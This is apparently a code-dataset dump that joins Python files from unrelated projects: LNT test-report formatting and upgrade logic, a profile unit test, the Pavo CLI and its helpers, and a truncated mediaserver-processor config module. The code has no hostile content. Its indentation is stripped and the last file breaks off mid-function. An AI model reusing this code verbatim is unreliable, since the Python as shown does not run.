items.append((test_name, arch,
normalized_value.getvalue()))
continue
# Add to the single file stack.
stage_name, = re.match(r'Single File \((.*)\)', test_name).groups()
try:
stack_index = self.single_file_stage_order.index(stage_name)
except ValueError:
stack_index = None
# If we don't have an index for this stage, ignore it.
if stack_index is None:
continue
# Otherwise, add the last value to the single file stack.
stack = self.single_file_table.get(group_key)
if stack is None:
self.single_file_table[group_key] = stack = \
[None] * len(self.single_file_stage_order)
stack[stack_index] = normalized_value.getvalue()[-1]
# If this is the last single file stage, also add a plot for it.
if stage_name == self.single_file_stage_order[-1]:
items = self.grouped_table[group_key] = self.grouped_table.get(
group_key, [])
values = normalized_value.getvalue()
baseline = values[0]
items.append(('Single File Tests', arch,
[v/baseline for v in values]))
```
#### File: lnt/testing/__init__.py
```python
import datetime
import json
import re
from lnt.util import logger
# We define the following constants for use as sample values by
# convention.
PASS = 0
FAIL = 1
XFAIL = 2
def normalize_time(t):
if isinstance(t, float):
t = datetime.datetime.utcfromtimestamp(t)
elif not isinstance(t, datetime.datetime):
t = datetime.datetime.strptime(t, '%Y-%m-%d %H:%M:%S')
return t.strftime('%Y-%m-%d %H:%M:%S')
class Report:
"""Information on a single testing run.
In the LNT test model, every test run should define exactly one
machine and run, and any number of test samples.
"""
def __init__(self, machine, run, tests, report_version=1):
"""Construct a LNT report file format in the given format version."""
self.machine = machine
self.run = run
self.tests = list(tests)
self.report_version = report_version
self.check()
def check(self):
"""Check that object members are adequate to generate an LNT
json report file of the version specified at construction when
rendering that instance.
"""
# Check requested report version is supported by this library
assert self.report_version <= 2, "Only v2 or older LNT report format supported."
assert isinstance(self.machine, Machine), "Unexpected type for machine."
assert (
self.machine.report_version == self.report_version
), "Mismatch between machine and report version."
assert isinstance(self.run, Run), "Unexpected type for run."
assert (
self.run.report_version == self.report_version
), "Mismatch between run and report version."
for t in self.tests:
if self.report_version == 2:
assert isinstance(t, Test), "Unexpected type for test"
assert (
t.report_version == self.report_version
), "Mismatch between test and report version."
else:
assert isinstance(t, TestSamples), "Unexpected type for test samples."
def update_report(self, new_tests_samples, end_time=None):
"""Add extra samples to this report, and update the end time of
the run.
"""
self.check()
self.tests.extend(new_tests_samples)
self.run.update_endtime(end_time)
self.check()
def render(self, indent=4):
"""Return a LNT json report file format of the version specified
at construction as a string, where each object is indented by
indent spaces compared to its parent.
"""
if self.report_version == 2:
return json.dumps({'format_version': str(self.report_version),
'machine': self.machine.render(),
'run': self.run.render(),
'tests': [t.render() for t in self.tests]},
sort_keys=True, indent=indent)
else:
return json.dumps({'Machine': self.machine.render(),
'Run': self.run.render(),
'Tests': [t.render() for t in self.tests]},
sort_keys=True, indent=indent)
class Machine:
"""Information on the machine the test was run on.
The info dictionary can be used to describe additional information
about the machine, for example the hardware resources or the
operating environment.
    Machine entries in the database are uniqued by their name and the
entire contents of the info dictionary.
"""
def __init__(self, name, info={}, report_version=1):
self.name = str(name)
self.info = dict((str(key), str(value))
for key, value in info.items())
self.report_version = report_version
self.check()
def check(self):
"""Check object members are adequate to generate an LNT json
report file of the version specified at construction when
rendering that instance.
"""
# Check requested version is supported by this library
assert (
self.report_version <= 2
), "Only v2 or older supported for LNT report format Machine objects."
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
if self.report_version == 2:
d = dict(self.info)
d['Name'] = self.name
return d
else:
return {'Name': self.name,
'Info': self.info}
class Run:
"""Information on the particular test run.
At least one parameter must be supplied and is used as ordering
among several runs. When generating a report in format 1 or earlier,
both start_time and end_time are used for that effect and the
current date is used if their value is None.
As with Machine, the info dictionary can be used to describe
additional information on the run. This dictionary should be used to
describe information on the software-under-test that is constant
across the test run, for example the revision number being tested.
It can also be used to describe information about the current state
which could be useful in analysis, for example the current machine
load.
"""
def __init__(self, start_time=None, end_time=None, info={}, report_version=1):
if report_version <= 1:
if start_time is None:
start_time = datetime.datetime.utcnow()
if end_time is None:
end_time = datetime.datetime.utcnow()
self.start_time = normalize_time(start_time) if start_time is not None else None
self.end_time = normalize_time(end_time) if end_time is not None else None
self.info = dict()
# Convert keys/values that are not json encodable to strings.
for key, value in info.items():
key = str(key)
value = str(value)
self.info[key] = value
self.report_version = report_version
if self.report_version <= 1:
if 'tag' not in self.info:
raise ValueError("Missing 'tag' entry in 'info' dictionary")
if 'run_order' not in self.info:
raise ValueError("Missing 'run_order' entry in 'info' dictionary")
else:
if 'llvm_project_revision' not in self.info:
raise ValueError("Missing 'llvm_project_revision' entry in 'info' dictionary")
if '__report_version__' in info:
raise ValueError("'__report_version__' key is reserved")
if report_version == 1:
self.info['__report_version__'] = '1'
self.check()
def check(self):
"""Check object members are adequate to generate an LNT json
report file of the version specified at construction when
rendering that instance.
"""
# Check requested version is supported by this library
assert (
self.report_version <= 2
), "Only v2 or older supported for LNT report format Run objects."
if self.start_time is None and self.end_time is None and not bool(self.info):
raise ValueError("No data defined in this Run")
def update_endtime(self, end_time=None):
"""Update the end time of this run."""
if self.report_version <= 1 and end_time is None:
end_time = datetime.datetime.utcnow()
self.end_time = normalize_time(end_time) if end_time else None
self.check()
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
if self.report_version == 2:
d = dict(self.info)
if self.start_time is not None:
d['start_time'] = self.start_time
if self.end_time is not None:
d['end_time'] = self.end_time
return d
else:
info = dict(self.info)
if self.report_version == 1:
info['__report_version__'] = '1'
return {'Start Time': self.start_time,
'End Time': self.end_time,
'Info': info}
class Test:
"""Information on a particular test in the run and its associated
samples.
The server automatically creates test database objects whenever a
new test name is seen. Test should be used to generate report in
version 2 or later of LNT JSON report file format.
Test names are intended to be a persistent, recognizable identifier
for what is being executed. Currently, most formats use some form of
dotted notation for the test name, and this may become enshrined in
the format in the future. In general, the test names should be
independent of the software-under-test and refer to some known
quantity, for example the software under test. For example,
'CINT2006.403_gcc' is a meaningful test name.
The test info dictionary is intended to hold information on the
particular permutation of the test that was run. This might include
    variables specific to the software-under-test. This could include,
for example, the compile flags the test was built with, or the
runtime parameters that were used. As a general rule, if two test
samples are meaningfully and directly comparable, then they should
    have the same test name but different info parameters.
"""
def __init__(self, name, samples, info={}, report_version=2):
self.name = name
self.samples = samples
self.info = dict()
# Convert keys/values that are not json encodable to strings.
for key, value in info.items():
key = str(key)
value = str(value)
self.info[key] = value
self.report_version = report_version
self.check()
def check(self):
"""Check object members are adequate to generate an LNT json
report file of the version specified at construction when
rendering that instance.
"""
# Check requested version is supported by this library and is
# valid for this object.
assert (
self.report_version == 2
), "Only v2 supported for LNT report format Test objects."
for s in self.samples:
assert isinstance(s, MetricSamples), "Unexpected type for metric sample."
assert (
s.report_version == self.report_version
), "Mismatch between test and metric samples."
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
d = dict(self.info)
d.update([s.render().popitem() for s in self.samples])
d['Name'] = self.name
return d
class TestSamples:
"""Information on a given test and its associated samples data.
Samples data must all relate to the same metric. When several
metrics are available for a given test, the convention is to have
one TestSamples per metric and to encode the metric into the name,
e.g. Benchmark1.exec. The server automatically creates test database
objects whenever a new test name is seen. TestSamples should only be
used to generate report in version 1 or earlier of LNT JSON report
file format.
Test names are intended to be a persistent, recognizable identifier
for what is being executed. Currently, most formats use some form of
dotted notation for the test name, and this may become enshrined in
the format in the future. In general, the test names should be
independent of the software-under-test and refer to some known
quantity, for example the software under test. For example,
'CINT2006.403_gcc' is a meaningful test name.
The test info dictionary is intended to hold information on the
particular permutation of the test that was run. This might include
    variables specific to the software-under-test. This could include,
for example, the compile flags the test was built with, or the
runtime parameters that were used. As a general rule, if two test
samples are meaningfully and directly comparable, then they should
    have the same test name but different info parameters.
The report may include an arbitrary number of samples for each test
for situations where the same test is run multiple times to gather
statistical data.
"""
def __init__(self, name, data, info={}, conv_f=float):
"""Create an instance representing the samples converted into
floating-point values using the conv_f function.
"""
self.name = str(name)
self.info = dict((str(key), str(value))
for key, value in info.items())
self.data = list(map(conv_f, data))
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
return {'Name': self.name,
'Info': self.info,
'Data': self.data}
def __repr__(self):
# TODO remove this
return "TestSample({}): {} - {}".format(self.name,
self.data,
self.info)
class MetricSamples:
"""Samples data for a given metric of a given test.
An arbitrary number of samples for a given metric is allowed for
situations where the same metric is obtained several time for a
given test to gather statistical data.
MetricSamples should be used to generate report in version 2 or
later of LNT JSON report file format.
"""
def __init__(self, metric, data, conv_f=float, report_version=2):
self.metric = str(metric)
self.data = list(map(conv_f, data))
self.report_version = report_version
self.check()
def check(self):
"""Check object members are adequate to generate an LNT json
report file of the version specified at construction when
rendering that instance.
"""
# Check requested version is supported by this library and is
# valid for this object.
assert (
self.report_version == 2
), "Only v2 supported for LNT report format MetricSamples objects."
def add_samples(self, new_samples, conv_f=float):
"""Add samples for this metric, converted to float by calling
function conv_f.
"""
self.data.extend(map(conv_f, new_samples))
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
return {self.metric: self.data if len(self.data) > 1 else self.data[0]}
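# A minimal composition sketch for the v2 report format using the classes
# above (machine name, revision and metric values are illustrative):
#
#   machine = Machine('my-machine', report_version=2)
#   run = Run(info={'llvm_project_revision': '123456'}, report_version=2)
#   test = Test('Benchmark1', [MetricSamples('execution_time', [0.5, 0.52])])
#   report = Report(machine, run, [test], report_version=2)
#   print(report.render())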
###
# Format Versioning
# We record information on the report "version" to allow the server to support
# some level of auto-upgrading data from submissions of older reports.
#
# We record the report version as a reserved key in the run information
# (primarily so that it can be accessed post-import on the server).
#
# Version 0 -- : initial (and unversioned).
#
# Version 1 -- 2012-04-12: run_order was changed to not be padded, and allow
# non-integral values.
#
# Version 2 -- 2017-06: Revamped json format
# - Directly uses lnt names (no 'info_key' names anymore)
# - Flatten Machine.Info and Run.Info into the Machine and Run records
# - One record for each test (not one record for test+metric) with one entry
# for each metric.
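# For reference, a sketch of the two shapes handled below (keys taken from the
# render() methods and upgrade_1_to_2(); values are illustrative):
#
#   v1: {"Machine": {"Name": ..., "Info": {...}},
#        "Run": {"Start Time": ..., "End Time": ...,
#                "Info": {"tag": "nts", "run_order": ..., "__report_version__": "1"}},
#        "Tests": [{"Name": "nts.Benchmark1.exec", "Info": {}, "Data": [...]}]}
#
#   v2: {"format_version": "2",
#        "machine": {"name": ...},
#        "run": {"llvm_project_revision": ..., "start_time": ...},
#        "tests": [{"name": "Benchmark1", "execution_time": ...}]}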
def _get_format_version(data):
format_version = data.get('format_version')
if format_version is not None:
return int(format_version)
# Older versions had a Run.Info.__report_version__ field
run = data.get('Run')
if run is not None:
info = run.get('Info')
if info is not None:
report_version = info.get('__report_version__', '0')
return int(report_version)
return None
def upgrade_0_to_1(data):
# We recompute the run_order here if it looks like this run_order was
# derived (we presume from sniffing a compiler).
run_info = data['Run']['Info']
run_order = run_info.get('run_order')
inferred_run_order = run_info.get('inferred_run_order')
# If the run order is missing, or wasn't the inferred one, do nothing.
if run_order is None or (run_order != inferred_run_order and
inferred_run_order is not None):
return data
# Otherwise, assume this run order was derived.
# Trim whitespace.
run_order = run_order.strip()
run_info['run_order'] = run_info['inferred_run_order'] = run_order
# If this was a production Clang build, try to recompute the src tag.
if 'clang' in run_info.get('cc_name', '') and \
run_info.get('cc_build') == 'PROD' and \
run_info.get('cc_src_tag') and \
run_order == run_info['cc_src_tag'].strip():
# Extract the version line.
version_ln = None
for ln in run_info.get('cc_version', '').split('\n'):
if ' version ' in ln:
version_ln = ln
break
else:
# We are done if we didn't find one.
return data
# Extract the build string.
m = re.match(r'(.*) version ([^ ]*) (\([^(]*\))(.*)',
version_ln)
if not m:
return data
cc_name, cc_version_num, cc_build_string, cc_extra = m.groups()
m = re.search('clang-([0-9.]*)', cc_build_string)
if m:
run_info['run_order'] = run_info['inferred_run_order'] = \
run_info['cc_src_tag'] = m.group(1)
data['Run']['Info']['__report_version__'] = "1"
return data
# Upgrading from version 1 to version 2 needs some schema in place
class _UpgradeSchema(object):
def __init__(self, metric_rename, machine_param_rename, run_param_rename):
self.metric_rename = metric_rename
self.machine_param_rename = machine_param_rename
self.run_param_rename = run_param_rename
_nts_upgrade = _UpgradeSchema(
metric_rename={
'.code_size': 'code_size',
'.compile': 'compile_time',
'.compile.status': 'compile_status',
'.exec': 'execution_time',
'.exec.status': 'execution_status',
'.hash': 'hash',
'.hash.status': 'hash_status',
'.mem': 'mem_bytes',
'.score': 'score',
}, machine_param_rename={
'name': 'hostname', # Avoid name clash with actual machine name.
}, run_param_rename={
'run_order': 'llvm_project_revision',
}
)
_compile_upgrade = _UpgradeSchema(
metric_rename={
'.mem': 'mem_bytes',
'.mem.status': 'mem_status',
'.size': 'size_bytes',
'.size.status': 'size_status',
'.sys': 'sys_time',
'.sys.status': 'sys_status',
'.user': 'user_time',
'.user.status': 'user_status',
'.wall': 'wall_time',
'.wall.status': 'wall_status',
}, machine_param_rename={
'hw.model': 'hardware',
'kern.version': 'os_version',
'name': 'hostname',
}, run_param_rename={
'run_order': 'llvm_project_revision',
}
)
_default_upgrade = _UpgradeSchema(
metric_rename={},
machine_param_rename={},
run_param_rename={
'run_order': 'llvm_project_revision',
}
)
_upgrades = {
'nts': _nts_upgrade,
'compile': _compile_upgrade
}
def upgrade_1_to_2(data, ts_name):
result = dict()
# Pull version and database schema to toplevel
result['format_version'] = '2'
report_version = data['Run']['Info'].pop('__report_version__', '1')
# We should not be in upgrade_1_to_2 for other versions
assert(report_version == '1')
tag = data['Run']['Info'].pop('tag', None)
if tag is not None and tag != ts_name:
raise ValueError("Importing '%s' data into '%s' testsuite" %
(tag, ts_name))
upgrade = _upgrades.get(tag)
if upgrade is None:
logger.warning("No upgrade schema known for '%s'\n" % tag)
upgrade = _default_upgrade
# Flatten Machine.Info into machine
Machine = data['Machine']
result_machine = {'name': Machine['Name']}
for key, value in Machine['Info'].items():
newname = upgrade.machine_param_rename.get(key, key)
if newname in result_machine:
raise ValueError("Name clash for machine info '%s'" % newname)
result_machine[newname] = value
result['machine'] = result_machine
# Flatten Result.Info into result
Run = data['Run']
result_run = {}
start_time = Run.get('Start Time')
if start_time is not None:
result_run['start_time'] = start_time
end_time = Run.get('End Time')
if end_time is not None:
result_run['end_time'] = end_time
for key, value in Run['Info'].items():
newname = upgrade.run_param_rename.get(key, key)
if newname in result_run:
raise ValueError("Name clash for run info '%s'" % newname)
result_run[newname] = value
result['run'] = result_run
# Merge tests
result_tests = list()
result_tests_dict = dict()
Tests = data['Tests']
for test in Tests:
test_Name = test['Name']
# Old testnames always started with 'tag.', split that part.
if len(test['Info']) != 0:
# The Info record didn't work with the v4 database anyway...
raise ValueError("Tests/%s: cannot convert non-empty Info record" %
test_Name)
tag_dot = '%s.' % ts_name
if not test_Name.startswith(tag_dot):
raise ValueError("Tests/%s: test name does not start with '%s'" %
(test_Name, tag_dot))
name_metric = test_Name[len(tag_dot):]
found_metric = False
for oldname, newname in upgrade.metric_rename.items():
assert(oldname.startswith('.'))
if name_metric.endswith(oldname):
name = name_metric[:-len(oldname)]
metric = newname
found_metric = True
break
if not found_metric:
# Fallback logic for unknown metrics: Assume they are '.xxxx'
name, dot, metric = name_metric.rpartition('.')
if dot != '.':
raise ValueError("Tests/%s: name does not end in .metric" %
test_Name)
logger.warning("Found unknown metric '%s'" % metric)
upgrade.metric_rename['.'+metric] = metric
result_test = result_tests_dict.get(name)
if result_test is None:
result_test = {'name': name}
result_tests_dict[name] = result_test
result_tests.append(result_test)
data = test['Data']
if metric not in result_test:
# Do not construct a list for the very common case of just a
# single datum.
if len(data) == 1:
data = data[0]
result_test[metric] = data
elif len(data) > 0:
# Transform the test data into a list
if not isinstance(result_test[metric], list):
result_test[metric] = [result_test[metric]]
result_test[metric] += data
result['tests'] = result_tests
return result
def upgrade_and_normalize_report(data, ts_name):
# Get the report version. V2 has it at the top level, older version
# in Run.Info.
format_version = _get_format_version(data)
if format_version is None:
data['format_version'] = '2'
format_version = 2
if format_version == 0:
data = upgrade_0_to_1(data)
format_version = 1
if format_version == 1:
data = upgrade_1_to_2(data, ts_name)
format_version = 2
if format_version != 2 or data['format_version'] != '2':
raise ValueError("Unknown format version")
if 'run' not in data:
import pprint
logger.info(pprint.pformat(data))
raise ValueError("No 'run' section in submission")
if 'machine' not in data:
raise ValueError("No 'machine' section in submission")
if 'tests' not in data:
raise ValueError("No 'tests' section in submission")
run = data['run']
if 'start_time' not in run:
time = datetime.datetime.utcnow().replace(microsecond=0).isoformat()
run['start_time'] = time
run['end_time'] = time
elif 'end_time' not in run:
run['end_time'] = run['start_time']
return data
__all__ = ['Report', 'Machine', 'Run', 'TestSamples']
```
#### File: tests/testing/profilev1impl.py
```python
import unittest, logging, sys, copy, tempfile, io
from lnt.testing.profile.profilev1impl import ProfileV1
from lnt.testing.profile.profile import Profile
logging.basicConfig(level=logging.DEBUG)
class ProfileV1Test(unittest.TestCase):
def setUp(self):
self.test_data = {
'counters': {'cycles': 12345.0, 'branch-misses': 200.0},
'disassembly-format': 'raw',
'functions': {
'fn1': {
'counters': {'cycles': 45.0, 'branch-misses': 10.0},
'data': [
[{}, 0x100000, 'add r0, r0, r0'],
[{'cycles': 100.0}, 0x100004, 'sub r1, r0, r0']
]
}
}
}
def test_serialize(self):
p = ProfileV1(copy.deepcopy(self.test_data))
with tempfile.NamedTemporaryFile() as f:
s = p.serialize(f.name)
self.assertTrue(ProfileV1.checkFile(f.name))
def test_deserialize(self):
p = ProfileV1(copy.deepcopy(self.test_data))
s = p.serialize()
fobj = io.BytesIO(s)
p2 = ProfileV1.deserialize(fobj)
self.assertEqual(p2.data, self.test_data)
def test_getFunctions(self):
p = ProfileV1(copy.deepcopy(self.test_data))
self.assertEqual(p.getFunctions(),
{'fn1': {'counters': {'cycles': 45.0, 'branch-misses': 10.0},
'length': 2}})
def test_saveFromRendered(self):
p = ProfileV1(copy.deepcopy(self.test_data))
s = Profile(p).render()
with tempfile.NamedTemporaryFile() as f:
Profile.saveFromRendered(s, filename=f.name)
            p2 = ProfileV1.deserialize(open(f.name, 'rb'))
self.assertEqual(p2.data, self.test_data)
if __name__ == '__main__':
unittest.main(argv=[sys.argv[0], ])
``` |
{
"source": "jobveldhuis/jackman",
"score": 2
} |
#### File: pavo/cli/_cli.py
```python
from sys import argv
from pkg_resources import get_distribution, WorkingSet, DistributionNotFound
from tabulate import tabulate
from ._messages import echo, info, warn, error
from .errors import UnknownCommandError, UnspecifiedCommandError, InvalidExecutionDirectoryError
from pavo.cli import Broadcast
from pavo.helpers.files import cd_is_project
from pavo.helpers.config import get_config_value
from pavo.helpers.decorators import allow_outside_project
def _main(args=None):
"""Main entry point for the CLI application.
Args:
args (list): List of arguments to be parsed and used, first one being the command.
"""
if not args:
args = argv[1:]
if cd_is_project() and get_config_value('version') != get_distribution("pavo").version:
warn('Your Pavo configuration file version does not match your Pavo version.')
listener = Broadcast().subscribe()
try:
command, optional_args = _parse(args)
listener.start()
if optional_args is not None:
command(*optional_args)
else:
command()
except UnspecifiedCommandError:
warn('\nYou did not specify a Pavo command, so we are showing you some help.')
_help()
except Exception as e:
message = str(e) if len(str(e)) > 0 else f'Something went wrong, check the logs for more info: {repr(e)}'
error(message, e)
# TODO: Remove tmp folders when they are not used to serve a website locally
# Wait for all messages to be listened to by the listener daemon
while Broadcast().spy():
pass
exit()
def _get_commands():
"""Get a list of all commands based on name in 'pavo_commands' namespace.
This function finds installed modules and checks whether or not they are activated in the plugins section of the
Pavo configuration file. If this is the case, the 'pavo' entry points will be loaded and made
available to the CLI.
Returns:
dict: A dictionary of all commands mapped from name to function.
"""
commands = {}
# Create a WorkingSet with core Pavo functionality
ws = WorkingSet(entries=[])
ws.add(get_distribution('pavo'))
# Get all activated plugins and try adding them to the working set
try:
activated_plugins = get_config_value('plugins')
if isinstance(activated_plugins, list):
for plugin in activated_plugins:
try:
ws.add(get_distribution(plugin))
except DistributionNotFound:
warn(f'Could not load commands from {plugin}. Are you sure the module is installed?')
except TypeError as e:
        error('Fatal error when trying to load commands. Please check your config file and the logs.', e)
except FileNotFoundError:
# If outside of a Pavo project use *all* installed packages to find Pavo commands.
ws = WorkingSet()
# Iterate over all entry points in the working set
for entry_point in ws.iter_entry_points('pavo_commands'):
if entry_point.name in commands:
warn(f'Could not load {entry_point.name} again, because it has been defined already.')
else:
commands[entry_point.name] = entry_point.load()
return commands
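# For illustration, a plugin exposes commands by registering entry points in
# the 'pavo_commands' group; a hypothetical setup.py snippet could look like:
#
#   setup(
#       name='pavo-hello',
#       entry_points={
#           'pavo_commands': [
#               'hello = pavo_hello:main',
#           ],
#       },
#   )
#
# The plugin must also be listed under 'plugins' in the Pavo configuration
# file before its commands are loaded inside a project.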
def _parse(args):
"""Parses arguments and throws an error when parsing to a command is not possible.
Args:
args (list): A list of arguments, starting with the command.
Returns:
(function, list): The function and optional arguments that are to be executed.
Raises:
UnspecifiedCommandError: No command was specified
InvalidExecutionDirectoryError: The current directory is not a Pavo project.
UnknownCommandError: The specified command has not been registered or is unknown.
"""
if len(args) < 1:
raise UnspecifiedCommandError
selected = args[0]
optional_args = args[1:]
available_commands = _get_commands()
if selected not in available_commands:
raise UnknownCommandError
func = available_commands[selected]
if not cd_is_project() and (not hasattr(func, 'allowed_outside_project') or func.allowed_outside_project is False):
raise InvalidExecutionDirectoryError
return func, optional_args
@allow_outside_project
def _help(specified_command=None):
"""Prints the help information for Pavo or a specific command.
Args:
specified_command (str): The command to show help for. Defaults to None.
Raises:
UnknownCommandError: The specified command has not been registered or is unknown.
"""
command_list = _get_commands()
if not specified_command:
table = []
for command in command_list:
try:
table.append([command, command_list[command].__doc__.splitlines()[0]])
except AttributeError:
table.append([command, ''])
info(f'\nShowing help for all {len(command_list)} Pavo commands:\n')
echo(tabulate(table, tablefmt='plain'))
else:
if specified_command in command_list:
info(f'\nShowing help for {specified_command}:\n')
echo(command_list[specified_command].__doc__)
else:
raise UnknownCommandError
info(f'\nPavo v{get_distribution("pavo").version}\n')
exit()
if __name__ == '__main__':
_main(argv[1:])
```
#### File: pavo/cli/_messages.py
```python
import logging
from colorama import init, Fore, Style
from pavo.helpers.config import get_config_value
log = logging.getLogger('pavo')
try:
log.setLevel(get_config_value('logging.level'))
log.disabled = get_config_value('logging.enabled') == 'false'
# Only add a file formatter when the configuration file can be found
# This ensures that no log file exists outside of a Pavo project
file_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
file_handler = logging.FileHandler('pavo.log')
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(file_formatter)
log.addHandler(file_handler)
log.propagate = False
except FileNotFoundError:
log.disabled = True
# Initialize Colorama
init()
def ask(msg):
"""Asks the user for input and returns the value.
Args:
msg (str): The input prompt for the user.
Returns:
str: The user input.
"""
return input(f'{Fore.YELLOW}> {msg}{Style.RESET_ALL}')
def debug(msg, **kwargs):
"""Silently logs the message to the debug log.
Args:
msg (str): The message that will be shown to the user.
kwargs: See below.
Keyword Arguments:
logger_name (str): Used to override the default 'pavo' name for the logger.
"""
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.debug(msg)
else:
log.debug(msg)
def echo(msg, **kwargs):
"""Echo's back the message, without logging it.
Args:
msg (str): The message that will be shown to the user.
"""
print(f'{Fore.WHITE}{msg}{Style.RESET_ALL}')
def info(msg, **kwargs):
"""Shows information about runtime.
Args:
msg (str): The message that will be shown to the user.
"""
if kwargs.get('header', False):
print(f'{Fore.BLUE}{msg}{Style.RESET_ALL}')
else:
print(f'{Fore.WHITE}{msg}{Style.RESET_ALL}')
if not kwargs.get('disable_logging', False):
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.info(msg)
else:
log.info(msg)
def warn(msg, **kwargs):
"""Shows a warning in the console and logs it to the Pavo log.
Args:
msg (str): The message that will be shown to the user.
kwargs: See below.
Keyword Arguments:
disable_logging (bool): When set to True, disables the log for a call.
logger_name (str): Used to override the default 'pavo' name for the logger.
"""
print(f'{Fore.YELLOW}{msg}{Style.RESET_ALL}')
if not kwargs.get('disable_logging', False):
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.warning(msg)
else:
log.warning(msg)
def error(msg, exc=None, **kwargs):
"""Prints an error message to the terminal and, if provided, logs the exception.
Args:
msg (str): The message that will be shown to the user.
        exc (Exception): The exception that was caught and led to this error message.
kwargs: See below.
Keyword Arguments:
disable_logging (bool): When set to True, disables the log for a call.
logger_name (str): Used to override the default 'pavo' name for the logger.
        unsafe (bool): When set to True, does not exit the program after catching an error.
"""
print(f'{Fore.RED}{msg}{Style.RESET_ALL}')
if not kwargs.get('disable_logging', False) and exc is not None:
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.exception(exc)
else:
log.exception(exc)
if 'unsafe' not in kwargs or kwargs['unsafe'] is False:
exit()
def success(msg, **kwargs):
"""Prints a green success message to the terminal and logs it.
Args:
msg (str): The message that will be shown to the user.
kwargs: See below.
Note:
The success log will be of type 'info'.
Keyword Arguments:
disable_logging (bool): When set to True, disables the log for a call.
logger_name (str): Used to override the default 'pavo' name for the logger.
disable_checkmark (bool): Whether or not to show a checkmark with the success message.
"""
if kwargs.get('disable_checkmark', False):
print(f'{Fore.GREEN}{msg}{Style.RESET_ALL}')
else:
print(f'{Fore.GREEN}\u2713 {msg}{Style.RESET_ALL}')
if not kwargs.get('disable_logging', False):
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.info(msg)
else:
log.info(msg)
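# --- Hypothetical usage sketch (not part of the original module) ---
# Shows how the helpers above could be combined in a command; the 'build'
# workflow and logger name below are illustrative only.
def _example_build_feedback():
    name = ask('What should the site be called?')
    info(f'Building {name}...', disable_logging=True)
    warn('Draft pages are skipped by default.')
    success(f'{name} built successfully.', logger_name='pavo.build')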
```
#### File: pavo/helpers/decorators.py
```python
from functools import wraps
def singleton(class_):
"""Singleton decorator for classes.
    This decorator ensures there exists only a single instance of a class, which allows sharing of data by
accessing the class as a sort of global variable.
"""
instances = {}
def get_instance(*args, **kwargs):
if class_ not in instances:
instances[class_] = class_(*args, **kwargs)
return instances[class_]
return get_instance
def allow_outside_project(func):
"""Marks a Pavo entry point as allowed to run outside of a Pavo project."""
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.allowed_outside_project = True
return wrapper
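# --- Hypothetical usage sketch (not part of the original module) ---
# The class and command below are illustrative; only the decorators come from
# this module.
@singleton
class _ExampleCache:
    def __init__(self):
        self.items = {}
@allow_outside_project
def _example_version():
    """Prints version information; safe to run outside a Pavo project."""
    return '0.0.0'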
``` |
{
"source": "jobveldhuis/python-mediaserver-processor",
"score": 2
} |
#### File: python-mediaserver-processor/mediaserver_processor/helpers.py
```python
import re
import os
import yaml
from watchgod import DefaultDirWatcher
import logging
class Config(dict):
"""
Configuration class, behaves like a standard dict.
"""
def __init__(self, *args, **kwargs):
super(Config, self).__init__(*args, **kwargs)
# Standard configuration settings, please do not overwrite but load using yaml template
# Directories
self['DIRECTORIES'] = {
'QUEUE_DIR': './queue',
'OUT_DIR': './out',
'TMP_DIR': './tmp',
'ORIGINALS_DIR': './originals',
'LOG_DIR': './logs'
}
# Actions
self['ALLOWED_FILE_TYPES'] = ['jpg', 'jpeg', 'png']
self['FILE_TYPE_TRANSPARENT'] = 'png'
self['FILE_TYPE_NONTRANSPARENT'] = 'jpeg'
self['ALWAYS_SAVE_AS'] = ['webp']
self['SOURCE_SET'] = [(100, 100), (250, 250)]
self['OPTIMIZE'] = True
self['HASH_FILE_NAMES'] = False
self['PROCESS_LEFTOVER_IMAGES'] = True
# What to do with unknown file types (not png, jpg or jpeg) or unprocessable images
self['HARD_KEEP_FILE_TYPE'] = True
self['HARD_DELETE_UNKNOWN_TYPES'] = True
self['HARD_DELETE_UNPROCESSABLE'] = True
# Settings for file permissions
self['OVERWRITE_FILE_PERMISSIONS'] = False
self['FILE_PERMISSIONS'] = None
# Safety feature to check for malicious files to be uploaded (Decompression Bombs)
self['MAX_IMAGE_PIXELS'] = 10000000
self['IGNORE_COMPRESSION_BOMBS'] = True
# Settings for logging
self['DISABLE_LOGGING'] = False
self['LOG_LEVEL'] = logging.INFO
self['LOG_FILE_NAME'] = 'mediaserver'
def load(self, file):
"""
Add key/value pairs to the configuration. Overwrite where necessary.
Parameters
----------
file : str
Relative path to the yaml-file to load into the configuration.
Returns
-------
None
"""
dictionary = load_yaml(file)
for item in dictionary:
self[item] = dictionary[item]
class FileWatcher(DefaultDirWatcher):
"""
Used to watch the directory for changes.
"""
def __init__(self, root_path):
self.include_pattern = re.compile(r"^[._]")
super().__init__(root_path)
def should_watch_file(self, entry):
"""
Returns whether or not the file should be watched. Ignores all files starting with a '.' or '_'
Parameters
----------
entry : os.DirEntry
The file that was found in the directory.
Returns
-------
bool
Whether or not the file should be watched.
"""
return not self.include_pattern.match(entry.name)
def should_watch_dir(self, entry):
"""
Returns false, so directory changes are ignored.
        Parameters
        ----------
entry : os.DirEntry
The directory that was changed in the main directory.
Returns
-------
False : bool
Directories should be ignored, thus the value False is always returned.
"""
return False
def is_yaml(path):
"""
Checks whether the file at path is a yaml-file.
Parameters
----------
path : str
The relative path to the file that should be checked.
Returns
-------
bool
Whether or not the specified file is a yaml-file.
"""
return path.endswith('.yaml') or path.endswith('.yml')
def load_yaml(file):
"""
Loads a yaml-file into a Python dictionary.
Parameters
----------
file : str
Relative path to the file that should be loaded into a dict.
Raises
------
ValueError
When specified file is not a yaml-file, and thus, cannot be loaded.
Returns
-------
items : dict
The dictionary that was retrieved from the Yaml-file.
"""
if not is_yaml(file):
